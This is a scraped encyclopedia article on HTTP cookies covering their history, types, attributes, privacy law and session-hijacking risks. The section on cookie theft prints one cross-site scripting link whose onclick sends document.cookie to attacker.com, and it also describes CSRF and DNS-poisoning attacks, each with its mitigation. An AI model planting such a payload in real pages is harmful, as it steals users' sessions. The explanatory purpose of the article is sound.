- HTTP cookie
HTTP Persistence · Compression · HTTPS Request methods OPTIONS · GET · HEAD · POST · PUT · DELETE · TRACE · CONNECT Header fields Cookie · ETag · Location · Referer DNT · X-Forwarded-For Status codes 301 Moved permanently 302 Found 303 See Other 403 Forbidden 404 Not Found
A cookie, also known as an HTTP cookie, web cookie, or browser cookie, is used for an origin website to send state information to a user's browser and for the browser to return the state information to the origin site. The state information can be used for authentication, identification of a user session, user's preferences, shopping cart contents, or anything else that can be accomplished through storing text data on the user's computer.
Cookies are not software. They cannot be programmed, cannot carry viruses, and cannot install malware on the host computer. However, they can be used by spyware to track user's browsing activities – a major privacy concern that prompted European and US law makers to take action. Cookies can also be stolen by hackers to gain access to a victim's web account.
- 1 History
- 2 Terminologies
- 3 Uses
- 4 Implementation
- 5 Browser settings
- 6 Privacy and third-party cookies
- 7 Cookie theft and session hijacking
- 8 Drawbacks of cookies
- 9 Alternatives to cookies
- 10 See also
- 11 References
- 12 External links
The term "cookie" was derived from "magic cookie", which is the packet of data a program receives and sends again unchanged. Magic cookies were already used in computing when computer programmer Lou Montulli had the idea of using them in Web communications in June 1994. At the time, he was an employee of Netscape Communications, which was developing an e-commerce application for a customer. Cookies provided a solution to the problem of reliably implementing a virtual shopping cart.
The introduction of cookies was not widely known to the public at the time. In particular, cookies were accepted by default, and users were not notified of the presence of cookies. The general public learned about them after the Financial Times published an article about them on February 12, 1996. In the same year, cookies received a lot of media attention, especially because of potential privacy implications. Cookies were discussed in two U.S. Federal Trade Commission hearings in 1996 and 1997.
The development of the formal cookie specifications was already ongoing. In particular, the first discussions about a formal specification started in April 1995 on the www-talk mailing list. A special working group within the IETF was formed. Two alternative proposals for introducing state in HTTP transactions had been proposed by Brian Behlendorf and David Kristol respectively, but the group, headed by Kristol himself, soon decided to use the Netscape specification as a starting point. In February 1996, the working group identified third-party cookies as a considerable privacy threat. The specification produced by the group was eventually published as RFC 2109 in February 1997. It specifies that third-party cookies were either not allowed at all, or at least not enabled by default.
At this time, advertising companies were already using third-party cookies. The recommendation about third-party cookies of RFC 2109 was not followed by Netscape and Internet Explorer. RFC 2109 was superseded by RFC 2965 in October 2000.
A definitive specification for cookies as used in the real world was published as RFC 6265 in April 2011.
A session cookie only lasts for the duration of users using the website. A web browser normally deletes session cookies when it quits. A session cookie is created when no Expires directive is provided when the cookie is created.
A persistent cookie will outlast user sessions. If a persistent cookie has its Max-Age set to 1 year, then, within the year, the initial value set in that cookie would be sent back to the server every time the user visited the server. This could be used to record a vital piece of information such as how the user initially came to this website. For this reason, persistent cookies are also called tracking cookies or in-memory cookies.
A secure cookie is only used when a browser is visiting a server via HTTPS, ensuring that the cookie is always encrypted when transmitting from client to server. This makes the cookie less likely to be exposed to cookie theft via eavesdropping.
First-party cookies are cookies set with the same domain (or its subdomain) in your browser's address bar. Third-party cookies are cookies being set with different domains than the one shown on the address bar (i.e. the web pages on that domain may feature content from a third-party domain - e.g. an advertisement run by www.advexample.com showing advert banners).
For example: Suppose a user visits
www.example1.com, which sets a cookie with the domain
ad.foxytracking.com. When the user later visits
www.example2.com, another cookie is set with the domain
ad.foxytracking.com. Eventually, both of these cookies will be sent to the advertiser when loading their ads or visiting their website. The advertiser can then use these cookies to build up a browsing history of the user across all the websites this advertiser has footprints on.
A "supercookie" is a cookie with a public suffix domain, like
Most browsers, by default, allow first-party cookies—a cookie with domain to be the same or sub-domain of the requesting host. For example, a user visiting
www.example.comcan have a cookie set with domain
.example.com, but not
.com. A supercookie with domain
.comwould be blocked by browsers; otherwise, a malicious website, like
attacker.com, could set a supercookie with domain
.comand potentially disrupt or impersonate legitimate user requests to
example.com. The Public Suffix List is a cross-vendor initiative to provide an accurate list of domain name suffixes changing. Older versions of browsers may not have the most up-to-date list, and will therefore be vulnerable to certain supercookies.
The term "supercookies" is erroneously used in the media for tracking technologies that do not rely on HTTP cookies. Two such "supercookie" mechanisms were found on Microsoft websites: cookie syncing that respawned MUID cookies, and ETag cookies. Due to media attention, Microsoft later disabled this code:In response to recent attention on "supercookies" in the media, we wanted to share more detail on the immediate action we took to address this issue, as well as affirm our commitment to the privacy of our customers. According to researchers, including Jonathan Mayer at Stanford University, "supercookies" are capable of re-creating users' cookies or other identifiers after people deleted regular cookies. Mr. Mayer identified Microsoft as one among others that had this code, and when he brought his findings to our attention we promptly investigated. We determined that the cookie behavior he observed was occurring under certain circumstances as a result of older code that was used only on our own sites, and was already scheduled to be discontinued. We accelerated this process and quickly disabled this code. At no time did this functionality cause Microsoft cookie identifiers or data associated with those identifiers to be shared outside of Microsoft.—Mike Hintze
A zombie cookie is any cookie that is automatically recreated after a user has deleted it. This is accomplished by a script storing the content of the cookie in some other locations, such as the local storage available to Flash content, HTML5 storages and other client side mechanisms, and then recreating the cookie from backup stores when the cookie's absence is detected.
Cookies may be used to maintain data related to the user during navigation, possibly across multiple visits. Cookies were introduced to provide a way to implement a "shopping cart" (or "shopping basket"), a virtual device into which users can store items they want to purchase as they navigate throughout the site.
Shopping basket applications today usually store the list of basket contents in a database on the server side, rather than storing basket items in the cookie itself. A web server typically sends a cookie containing a unique session identifier. The web browser will send back that session identifier with each subsequent request and shopping basket items are stored associated with a unique session identifier.
Cookies may be used to remember the information about the user who has visited a website in order to show relevant content in the future. For example a web server may send a cookie containing the username last used to log in to a web site so that it may be filled in for future visits.
Tracking cookies may be used to track internet users' web browsing habits. This can also be done in part by using the IP address of the computer requesting the page or the referrer field of the HTTP request header, but cookies allow for greater precision. This can be demonstrated as follows:
- If the user requests a page of the site, but the request contains no cookie, the server presumes that this is the first page visited by the user; the server creates a random string and sends it as a cookie back to the browser together with the requested page;
- From this point on, the cookie will be automatically sent by the browser to the server every time a new page from the site is requested; the server sends the page as usual, but also stores the URL of the requested page, the date/time of the request, and the cookie in a log file.
By looking at the log file, it is then possible to find out which pages the user has visited and in what sequence.
Cookie specifications suggest that browsers should be able to save and send back a minimal number of cookies. In particular, a web browser is expected to be able to store at least 300 cookies of four kilobytes each, and at least 20 cookies per server or domain.
Transfer of Web pages follows the HyperText Transfer Protocol (HTTP). Regardless of cookies, browsers request a page from web servers by sending them a usually short text called HTTP request. For example, to access the page http://www.example.org/index.html, browsers connect to the server www.example.org sending it a request that looks like the following one:
browser -------→ server
The server replies by sending the requested page preceded by a similar packet of text, called 'HTTP response'. This packet may contain lines requesting the browser to store cookies:
browser ←------- server
The server sends lines of
Set-Cookieonly if the server wishes the browser to store cookies.
Set-Cookieis a directive for the browser to store the cookie and send it back in future requests to the server (subject to expiration time or other cookie attributes), if the browser supports cookies and cookies are enabled. For example, the browser requests the page http://www.example.org/spec.html by sending the server www.example.org a request like the following:
browser -------→ server
This is a request for another page from the same server, and differs from the first one above because it contains the string that the server has previously sent to the browser. This way, the server knows that this request is related to the previous one. The server answers by sending the requested page, possibly adding other cookies as well.
The value of a cookie can be modified by the server by sending a new
Set-Cookie: name=newvalueline in response of a page request. The browser then replaces the old value with the new one.
The term "cookie crumb" is sometimes used to refer to the name-value pair. This is not the same as breadcrumb web navigation, which is the technique of showing in each page the list of pages the user has previously visited; this technique, however, may be implemented using cookies.
document.cookieis used for this purpose. For example, the instruction
document.cookie = "temperature=20"creates a cookie of name
Besides the name-value pair, servers can also set these cookie attributes: a cookie domain, a path, expiration time or maximum age, secure flag and httponly flag. Browsers will not send cookie attributes back to the server. They will only send the cookie’s name-value pair. Cookie attributes are used by browsers to determine when to delete a cookie, block a cookie or whether to send a cookie (name-value pair) to the servers.
Domain and Path
The cookie domain and path define the scope of the cookie—they tell the browser that cookies should only be sent back to the server for the given domain and path. If not specified, they default to the domain and path of the object that was requested. An example of Set-Cookie directives from a website after a user logged in:
The first cookie
LSIDhas default domain
/accounts, which tells the browser to use the cookie only when requesting pages contained in
docs.foo.com/accounts. The other 2 cookies
SSIDwould be sent back by the browser while requesting any subdomain in
.foo.comon any path, for example
Cookies can be set on only top domain and its sub domains. Setting cookies on
www.bar.comwill not work for security reasons.
Expires and Max-Age
The Expires directive tells the browser when to delete the cookie. It is specified in the form of “Wdy, DD-Mon-YYYY HH:MM:SS GMT”, indicating the exact date/time this cookie will expire. As an alternative to setting cookie expiration as an absolute date/time, RFC 6265 allows the use of the Max-Age attribute to set the cookie’s expiration as an interval of seconds in the future, relative to the time the browser received the cookie. An example of Set-Cookie directives from a website after a user logged in:
The first cookie
luis set to expire sometime in 15-Jan-2013; it will be used by the client browser until that time. The second cookie
made_write_conndoes not have an expiration date, making it a session cookie. It will be deleted after the user closes his/her browser. The third cookie
reg_fb_gatehas its value changed to deleted, with an expiration time in the past. The browser will delete this cookie right away – note that cookie will only be deleted when the domain and path attributes in the
Set-Cookiefield match the values used when the cookie was created.
Secure and HttpOnly
The Secure and HttpOnly attributes do not have associated values. Rather, the presence of the attribute names indicates that the Secure and HttpOnly behaviors are specified.
Most modern browsers support cookies and allow the user to disable them. The following are common options:
- To enable or disable cookies completely, so that they are always accepted or always blocked.
- To allow the user to see the cookies that are active with respect to a given page by typing
- By default, Internet Explorer allows only third-party cookies that are accompanied by a P3P "CP" (Compact Policy) field.
Advertising companies use third-party cookies to track a user across multiple sites. In particular, an advertising company can track a user across all pages where it has placed advertising images or web bugs. Knowledge of the pages visited by a user allows the advertising company to target advertisements to the user's presumed preferences.
The possibility of building a profile of users is considered by some a potential privacy threat, especially when tracking is done across multiple domains using third-party cookies. For this reason, some countries have legislation about cookies.
The United States government has set strict rules on setting cookies in 2000 after it was disclosed that the White House drug policy office used cookies to track computer users viewing its online anti-drug advertising. In 2002, privacy activist Daniel Brandt found that the CIA had been leaving persistent cookies on computers which had visited its web site. When notified it was violating policy, CIA stated that these cookies were not intentionally set and stopped setting them. On December 25, 2005, Brandt discovered that the National Security Agency had been leaving two persistent cookies on visitors' computers due to a software upgrade. After being informed, the National Security Agency immediately disabled the cookies.
- the user is provided information about how this data is used;
- the user is given the possibility of denying this storing operation. However, this article also states that storing data that is necessary for technical reasons is exempted from this rule. This directive was expected to have been applied since October 2003, but a December 2004 report says (page 38) that this provision was not applied in practice, and that some member countries (Slovakia, Latvia, Greece, Belgium, and Luxembourg) did not even implement the provision in national law. The same report suggests a thorough analysis of the situation in the Member States.
Many web browsers including Apple's Safari and Microsoft Internet Explorer versions 6 and 7 support P3P which allows the web browser to determine whether to allow third-party cookies to be stored. The Opera web browser allows users to refuse third-party cookies and to create global and specific security profiles for Internet domains. Firefox 2.x dropped this option from its menu system but it restored it with the release of version 3.x.
Third-party cookies can be blocked by most browsers to increase privacy and reduce tracking by advertising and tracking companies without negatively affecting the user's Web experience. Many advertising operators have an opt-out option to behavioural advertising, with a generic cookie in the browser stopping behavioural advertising.
Cookie theft and session hijacking
Listed here are various scenarios of cookie theft and user session hijacking (even without stealing user cookies) which work with web sites which rely solely on HTTP cookies for user identification.
Traffic on a network can be intercepted and read by computers on the network other than the sender and receiver (particularly over unencrypted open Wi-Fi). This traffic includes cookies sent on ordinary unencrypted HTTP sessions. Where network traffic is not encrypted, attackers can therefore read the communications of other users on the network, including HTTP cookies as well as the entire contents of the conversations.
An attacker could use intercepted cookies to impersonate a user and perform a malicious task, such as transferring money out of the victim’s bank account.
This issue can be resolved by securing the communication between the user's computer and the server by employing Transport Layer Security (HTTPS protocol) to encrypt the connection. A server can specify the Secure flag while setting a cookie, which will cause the browser to send the cookie only over an encrypted channel, such as an SSL connection.
Publishing false sub-domain – DNS cache poisoning
Via DNS cache poisoning, an attacker might be able to cause a DNS server to cache a fabricated DNS entry, say
f12345.www.example.comwith the attacker’s server IP address. The attacker can then post an image URL from his own server (for example,
http://f12345.www.example.com/img_4_cookie.jpg). Victims reading the attacker’s message would download this image from
f12345.www.example.comis a sub-domain of
www.example.com, victims’ browsers would submit all
example.com-related cookies to the attacker’s server; the compromised cookies would also include HttpOnly cookies.[clarification needed]
This vulnerability is usually for Internet Service Providers to fix, by securing their DNS servers. But it can also be mitigated if
www.example.comis using Secure cookies. Victims’ browsers will not submit Secure cookies if the attacker’s image is not using encrypted connections. If the attacker chose to use HTTPS for his img_4_cookie.jpg download, he would have the challenge of obtaining an SSL certificate for
f12345.www.example.comfrom a Certificate Authority. Without a proper SSL certificate, victims’ browsers would display (usually very visible) warning messages about the invalid certificate, thus alerting victims as well as security officials from
As an example, an attacker may post a message on
www.example.comwith the following link:
<a href="#" onclick="window.location='http://attacker.com/stole.cgi?text='+escape(document.cookie); return false;"> Click here!</a>
When another user clicks on this link, the browser executes the piece of code within the
onclickattribute, thus replacing the string
document.cookiewith the list of cookies of the user that are active for the page. As a result, this list of cookies is sent to the
attacker.comserver. If the attacker’s posting is on
https://www.example.com/somewhere, secure cookies will also be sent to attacker.com in plain text.
Cross-site scripting is a constant threat, as there are always some crackers trying to find a way of slipping in script tags to websites. It is the responsibility of the website developers to filter out such malicious code.
In the meantime, such attacks can be mitigated by using HttpOnly cookies. These cookies will not be accessible by client side script, and therefore the attacker will not be able to gather these cookies.
If an attacker was able to insert a piece of script to a page on
www.example.com, and a victim’s browser was able to execute the script, the script could simply carry out the attack. This attack would use victim’s browser to send HTTP requests to servers directly; therefore, the victim’s browser would submit all relevant cookies, including HttpOnly cookies, as well as Secure cookies if the script request is on HTTPS.
For example, on MySpace, Samy posted a short message “Samy is my hero” on his profile, with a hidden script to send Samy a “friend request” and then post the same message on the victim’s profile. A user reading Samy’s profile would send Samy a “friend request” and post the same message on this person’s profile. Then, the third person reading the second person’s profile would do the same. Pretty soon, this Samy worm became one of the fastest spreading viruses of all time.
This type of attack (with automated scripts) would not work if a website had CAPTCHA to challenge client requests.
Cross-site scripting – proxy request
In older version of browsers, there were security holes allowing attackers to script a proxy request by using XMLHttpRequest. For example, a victim is reading an attacker’s posting on
www.example.com, and the attacker’s script is executed in the victim’s browser. The script generates a request to
www.example.comwith the proxy server
attacker.com. Since the request is for
example.comcookies will be sent along with the request, but routed through the attacker’s proxy server, hence, the attacker can harvest victim’s cookies.
This attack would not work for Secure cookie, since Secure cookies go with HTTPS connections, and its protocol dictates end-to-end encryption, i.e., the information is encrypted on the user’s browser and decrypted on the destination server
www.example.com, so the proxy servers would only see encrypted bits and bytes.
Cross-site Request Forgery
For example, Bob might be browsing a chat forum where another user, Mallory, has posted a message. Suppose that Mallory has crafted an HTML image element that references an action on Bob's bank's website (rather than an image file), e.g.,
If Bob's bank keeps his authentication information in a cookie, and if the cookie hasn't expired, then the attempt by Bob's browser to load the image will submit the withdrawal form with his cookie, thus authorizing a transaction without Bob's approval.
Besides privacy concerns, cookies also have some technical drawbacks. In particular, they do not always accurately identify users, they can be used for security attacks, and they are often at odds with the Representational State Transfer (REST) software architectural style.
If more than one browser is used on a computer, each usually has a separate storage area for cookies. Hence cookies do not identify a person, but a combination of a user account, a computer, and a Web browser. Thus, anyone who uses multiple accounts, computers, or browsers has multiple sets of cookies.
Likewise, cookies do not differentiate between multiple users who share the same user account, computer, and browser.
Inconsistent state on client and server
Some of the operations that can be done using cookies can also be done using other mechanisms.
Some users may be tracked based on the IP address of the computer requesting the page. The server knows the IP address of the computer running the browser or the proxy, if any is used, and could theoretically link a users session to this IP address. However, these addresses are not reliable in identifying a user because computers and proxies are very often shared by several users.
Some systems such as Tor are designed to retain Internet anonymity and make tracking by IP address impractical or impossible.
URL (query string)
A more precise technique is based on embedding information into URLs. The query string part of the URL is the one that is typically used for this purpose, but other parts can be used as well. The Java Servlet and PHP session mechanisms both use this method if cookies are not enabled.
This method consists of the Web server appending query strings to the links of a Web page it holds when sending it to a browser. When the user follows a link, the browser returns the attached query string to the server.
Query strings used in this way and cookies are very similar, both being arbitrary pieces of information chosen by the server and sent back by the browser. However, there are some differences: since a query string is part of a URL, if that URL is later reused, the same attached piece of information is sent to the server. For example, if the preferences of a user are encoded in the query string of a URL and the user sends this URL to another user by e-mail, those preferences will be used for that other user as well.
Moreover, even if the same user accesses the same page two times, there is no guarantee that the same query string is used in both views. For example, if the same user arrives to the same page but coming from a page internal to the site the first time and from an external search engine the second time, the relative query strings are typically different while the cookies would be the same. For more details, see query string.
Other drawbacks of query strings are related to security: storing data that identifies a session in a query string enables or simplifies session fixation attacks, referrer logging attacks and other security exploits. Transferring session identifiers as HTTP cookies is more secure.
Hidden form fields
Another form of session tracking is to use web forms with hidden fields. This technique is very similar to using URL query strings to hold the information and has many of the same advantages and drawbacks; and if the form is handled with the HTTP GET method, the fields actually become part of the URL the browser will send upon form submission. But most forms are handled with HTTP POST, which causes the form information, including the hidden fields, to be appended as extra input that is neither part of the URL, nor of a cookie.
This approach presents two advantages from the point of view of the tracker: first, having the tracking information placed in the HTML source and POST input rather than in the URL means it will not be noticed by the average user; second, the session information is not copied when the user copies the URL (to save the page on disk or send it via email, for example).
This method can be easily used with any framework that supports web forms.
The downside is that every separate window or tab will initially have an empty window.name; in times of tabbed browsing this means that individually opened tabs (initiation by user) will not have a window name. Furthermore window.name can be used for tracking visitors across different web sites, making it of concern for Internet privacy.
In some respects this can be more secure than cookies due to not involving the server, so it is not vulnerable to network cookie sniffing attacks. However if special measures are not taken to protect the data, it is vulnerable to other attacks because the data is available across different web sites opened in the same window or tab.
The HTTP protocol includes the basic access authentication and the digest access authentication protocols, which allow access to a Web page only when the user has provided the correct username and password. If the server requires such credentials for granting access to a web page, the browser requests them from the user and, once obtained, the browser stores and sends them in every subsequent page request. This information can be used to track the user.
- Dynamic HTML
- Local Shared Object – Flash Cookies
- Session Beans
- Session (computer science)
- Session ID
- Web server session management
- Web Storage and DOM Storage
- Web visitor tracking
- Zombie cookie
- ^ "HTTP State Management Mechanism – Overview". IETF. 2011-04. http://tools.ietf.org/html/rfc6265#section-3.
- ^ Adam Penenberg. Cookie Monsters. Slate, November 7, 2005
- ^ "New net rules set to make cookies crumble". BBC. 2011-03-08. http://www.bbc.co.uk/news/technology-12668552.
- ^ "Sen. Rockefeller: Get Ready for a Real Do-Not-Track Bill for Online Advertising". Adage.com. 2011-05-06. http://adage.com/article/digital/sen-rockefeller-ready-a-real-track-bill/227426/.
- ^ Vamosi, Robert (2008-04-14). "Gmail cookie stolen via Google Spreadsheets". http://news.cnet.com/8301-10789_3-9918582-57.html.
- ^ Schwartz, John (2001-09-04). "Giving Web a Memory Cost Its Users Privacy". The New York Times. http://www.nytimes.com/2001/09/04/technology/04COOK.html.
- ^ a b Jey Kesan and Rajiv Shah. SSRN.com, Deconstructing Code. Chapter II.B (Netscape's cookies). Yale Journal of Law and Technology, 6, 277–389.
- ^ a b David Kristol. HTTP Cookies: Standards, privacy, and politics. ACM Transactions on Internet Technology, 1(2), 151–198, 2001. doi:10.1145/502152.502153 (an expanded version is freely available at arXiv:cs/0105018v1 [cs.SE])
- ^ "Press Release: Netscape Communications Offers New Network Navigator Free On The Internet". Web.archive.org. Archived from the original on 2006-12-07. http://web.archive.org/web/20061207145832/http://wp.netscape.com/newsref/pr/newsrelease1.html. Retrieved 2010-05-22.
- ^ "Usenet Post by Marc Andreessen: Here it is, world!". Groups.google.com. 1994-10-13. http://groups.google.com/group/comp.infosystems.www.users/msg/9a210e5f72278328. Retrieved 2010-05-22.
- ^ Hardmeier, Sandi (2005-08-25). "The history of Internet Explorer". Microsoft. http://www.microsoft.com/windows/IE/community/columns/historyofie.mspx. Retrieved 2009-01-04.
- ^ OWASP Browsers Supporting HttpOnly
- ^ a b c IETF HTTP State Management Mechanism – Apr, 2011 Obsoletes RFC 2965.
- ^ Article on HttpOnly 
- ^ The Public Suffix List is an initiative of Mozilla, ...to Avoid privacy-damaging "supercookies" being set for high-level domain name suffixes... Public Suffix List Mozilla Foundation
- ^ Fix cookie domain checks to not allow .co.uk Mozilla Bug 252342 Mozilla 2004
- ^ "Learn more about the Public Suffix List". Public Suffix List. http://publicsuffix.org/learn/. Retrieved 28 September 2011.
- ^ Mayer, Jonathan. "Tracking the Trackers: Microsoft Advertising". The Center for Internet and Society. http://cyberlaw.stanford.edu/node/6715. Retrieved 28 September 2011.
- ^ Burt, David. "Update on the issue of ‘supercookies’ used on MSN". https://blogs.technet.com/b/privacyimperative/archive/2011/08/19/update-on-the-issue-of-supercookies-used-on-msn.aspx. Retrieved 28 September 2011.
- ^ "Persistent client state HTTP cookies: Preliminary specification". Netscape. c1999. Archived from the original on 2007-08-05. http://web.archive.org/web/20070805052634/http://wp.netscape.com/newsref/std/cookie_spec.html.
- ^ RFC 2965 – HTTP State Management Mechanism (IETF)
- ^ "Cookie Property". MSDN. Microsoft. http://msdn2.microsoft.com/en-us/library/ms533693.aspx. Retrieved 2009-01-04.
- ^ Innovative, Php (2011-09-02). "Sharing Cookies Between Multiple Domains". InnovativePhp.. http://www.innovativephp.com/sharing-cookies-across-multiple-domains-hosted-on-different-servers/. Retrieved 2011-09-02.
- ^ (PDF) Symantec Internet Security Threat Report: Trends for July–December 2007 (Executive Summary). XIII. Symantec Corp.. April 2008. pp. 1–3. http://eval.symantec.com/mktginfo/enterprise/white_papers/b-whitepaper_exec_summary_internet_security_threat_report_xiii_04-2008.en-us.pdf. Retrieved May 11, 2008.
- ^ Whalen, David (June 8, 2002). "The Unofficial Cookie FAQ v2.6". Cookie Central. http://www.cookiecentral.com/faq/. Retrieved 2009-01-04.
- ^ "3rd-Party Cookies, DOM Storage and Privacy". grack.com: Matt Mastracci's blog. January 6, 2010. http://grack.com/blog/2010/01/06/3rd-party-cookies-dom-storage-and-privacy/. Retrieved 2010-09-20.
- ^ "How to Manage Cookies in Internet Explorer 6". Microsoft. December 18, 2007. http://support.microsoft.com/kb/283185. Retrieved 2009-01-04.
- ^ "Clearing private data". Firefox Support Knowledge base. Mozilla. 16 September 2008. http://support.mozilla.com/en-US/kb/Clearing+Private+Data#top. Retrieved 2009-01-04.
- ^ "Clear Personal Information : Clear browsing data". Google Chrome Help. Google. http://www.google.com/support/chrome/bin/answer.py?hl=en&answer=95582. Retrieved 2009-01-04.
- ^ "Clear Personal Information: Delete cookies". Google Chrome Help. Google. http://www.google.com/support/chrome/bin/answer.py?hl=en&answer=95626. Retrieved 2009-01-04.
- ^ Miyazaki, Anthony D. (2008), “Online Privacy and the Disclosure of Cookie Use: Effects on Consumer Trust and Anticipated Patronage,” Journal of Public Policy & Marketing, 23 (Spring), 19–33.
- ^ "CIA Caught Sneaking Cookies". CBS News. 2002-03-20. http://www.cbsnews.com/stories/2002/03/20/tech/main504131.shtml.
- ^ "Spy Agency Removes Illegal Tracking Files". The New York Times. 2005-12-29. http://www.nytimes.com/2005/12/29/national/29cookies.html.
- ^ "Directive 2002/58/EC of the European Parliament and of the Council of 12 July 2002 concerning the processing of personal data and the protection of privacy in the electronic communications sector". eur-lex.europa.eu. http://eur-lex.europa.eu/LexUriServ/LexUriServ.do?uri=CELEX:32002L0058:EN:NOT. Retrieved 2010-03-16.
- ^ "Cookie Settings for Opera 9". OperaWiki.info. http://operawiki.info/NewCookieSettings. Retrieved 2008-01-20.
- ^ "Disabling third party cookies". Mozilla.com. http://support.mozilla.com/en-US/kb/Disabling+third+party+cookies.
- ^ Pegoraro, Rob (July 17, 2005). "How to Block Tracking Cookies". Washington Post. p. F07. http://www.washingtonpost.com/wp-dyn/content/article/2005/07/16/AR2005071600111.html. Retrieved 2009-01-04.
- ^ Mozilla AddOns, TACO, the Targeted Advertising Cookie Opt-Out Firefox extension
- ^ Wired Hack Obtains 9 Bogus Certificates for Prominent Websites
- ^ Roy Fielding (2000). "Fielding Dissertation: CHAPTER 6: Experience and Evaluation". http://roy.gbiv.com/pubs/dissertation/evaluation.htm. Retrieved 2010-10-14.
- ^ Tilkov, Stefan (July 2, 2008). "REST Anti-Patterns". InfoQ. http://www.infoq.com/articles/rest-anti-patterns. Retrieved 2009-01-04.
- ^ "ThomasFrank.se". ThomasFrank.se. http://www.thomasfrank.se/sessionvars.html. Retrieved 2010-05-22.
- RFC 6265 – the official specification for HTTP cookies
- How Internet Cookies Work at HowStuffWorks
- Information About Cookies from Microsoft
- Cookies at the Electronic Privacy Information Center (EPIC)
- Taking the Byte Out of Cookies: Privacy, Consent, and the Web (PDF)
- Web handbook – Cookies from Delivery And Transformation Group, Cabinet Office, UK
- Cookie-Based Counting Overstates Size of Web Site Audiences at ComScore
- Don’t Tread on Our Cookies – The Web Privacy Manifesto at PBS
- Mozilla Knowledgebase: Cookies
Wikimedia Foundation. 2010.
Look at other dictionaries:
HTTP-Cookie — Ein HTTP Cookie, auch Browser Cookie genannt ([ˈkʊki]; engl. „Plätzchen“, „Keks“), ist eine spezielle Form der allgemeinen Magic Cookies. Es wird von einem Webserver zu einem Browser gesendet oder auf dem Client erzeugt und dort dauerhaft… … Deutsch Wikipedia
HTTP cookie — У этого термина существуют и другие значения, см. Cookie. HTTP Постоянное соединение · Сжатие · HTTPS Методы OPTIONS · GET · HEAD · POST · PUT · DELETE · TRACE · CONNECT · PATCH Заголовки Cookie … Википедия
HTTP cookie — noun A packet of information sent by a server to a World Wide Web browser and then returned by the browser each time it accesses that server, used to maintain state between otherwise stateless HTTP transactions, for example, to identify the user … Wiktionary
HTTP-Cookie — … Википедия
Cookie (Informatique) — Pour les articles homonymes, voir Cookie. ██████████ … Wikipédia en Français
Cookie (manga magazine) — Cookie Categories Shōjo manga Frequency Monthly Circulation 176,667 (2008) First issue 1999 Company Shueisha Country Japan … Wikipedia
Cookie — (куки): Magic cookie (печенье) компьютерный термин. HTTP Cookie куки в Интернете. Cookie журнал манги См. также Куки … Википедия
HTTP — (Hypertext Transfer Protocol) Familie: Internetprotokollfamilie Einsatzgebiet: Datenübertragung, Hypertext u. a. Port: 80/TCP HTTP im TCP/IP‑Protokollstapel: Anwendung HTTP Transport … Deutsch Wikipedia
HTTP-Anfrage — HTTP (Hypertext Transfer Protocol) Familie: Internetprotokollfamilie Einsatzgebiet: Datenübertragung, Hypertext u. a. Port: 80/TCP HTTP im TCP/IP‑Protokollstapel: Anwendung HTTP Transport … Deutsch Wikipedia